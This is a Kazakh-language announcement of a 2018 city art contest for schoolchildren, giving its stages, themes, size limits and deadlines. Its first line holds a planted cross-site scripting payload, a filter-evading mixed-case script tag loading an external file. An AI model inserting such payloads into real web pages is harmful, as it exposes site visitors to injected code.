<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.01.2018

2018 жылғы 8 ақпанда «Бояулар құпиясы» жас суретшілердің Қалалық байқауы

басталады.  Байқауға қатысу үшін 10-17

жастағы оқушыларды шақырамыз. Әр білім беру ұйымынан кем дегенде 15 адам

қатысады.

 

Байқаудың 1 кезеңіндегі ТАҚЫРЫПТАРЫ

1)    Классикалық кескіндеме;

2)    Аванград және эксперименталды кескіндеме;

3)    «Менің Отаным» (еркін тақырып).

              Байқауға жеке жұмыстар қабылданады (әрбір номинация

бойынша 1 жұмыс). Жұмыстар кенепте, қағазда немесе картонда орындалады.

Суреттер кез-келген техникамен (акварель, гуашь, пастель, май, сия және басқа

материалдар) орындалады. Жаңаша әдіспен

орындалған жұмыстар да қабылданады.

              Жұмыстың кіші көлемі: 30х40 см, бірақ 55х65 см-ден артық

емес (безендіруді есептемегенде 9). Барлық жұмыстарға қол қойылады және 12 см x

4,5 см көлемінде суреттемелі этикеткасы болады.

2 кезеңжас 

суретшілердің ішкі  сайысы

1)   «Коллаж» номинациясы. Қатысушылар түсі және фактурасы бойыншаерекшеленетін

қандай да бір негізге заттарды, материалдарды жабыстыру арқылы кез-келген

материалда (қатты қағаз, қағаз, кенеп) картина жасайды. Жұмысқа атау береді.

Жұмыстың ең кіші көлемі: 30х40 см, бірақ

55х65 см-ден артық емес. Жұмысты орындауға 2,5-тен 3 сағатқа дейін уақыт

беріледі.

2)   «Бояулар құпиясы» номинациясы. Байқау

жұмыстары кез-келген техникада – кескіндеме, акварель, гуашь, аралас техника,

кез-келгенжанрда –натюрморт, портрет, пейзаж орындалуы мүмкін. Орындалғанжұмысқа атау беріледі.

Жұмыстың ең кіші көлемі: 30х40 см, бірақ

55х65 см-ден артық емес. Жұмысты орындауға 2,5-тан 3 сағатқа дейін уақыт

беріледі.

3)   «Сүйікті кітаптардың иллюстрациясы»

номинациясы. Бұл номинациядағы жұмыстар кез-келген жанрда (ертегі,

шайқас, тұрмыстық және т.б.) графика техникасында (акварель, пастель, гельдік

қалам, түсті қарындаштар, аралас техникада), түрлі жанрда – (ертегілік, соғыс,

тұрмыстық т.б)  орындалады.

Жұмыстың ең кіші көлемі: 30х40 см, бірақ

55х65 см-ден артық емес. Жұмысты орындауға 2,5-тан 3 сағатқа дейін уақыт

беріледі.

Қатысушылар осы Байқауға қатысу үшін

материалдар мен құралдарды өздері алып келеді. Білім беру ұйымдары әр номинация бойынша мектептен қатысушыларды ұсыну

керек. БАЙҚАУҒА ҚАТЫСУ ҮШІН goovospitanie@mail.ruэлектрондық поштасына үлгі бойынша  ӨТІНІМДЕРДІ ҚАБЫЛДАУ  2018 жылғы 7 ақпанда АЯҚТАЛАДЫ. 

 

Просмотров: 351


Пікір қосу



Деректерді қолтаңбаға қосу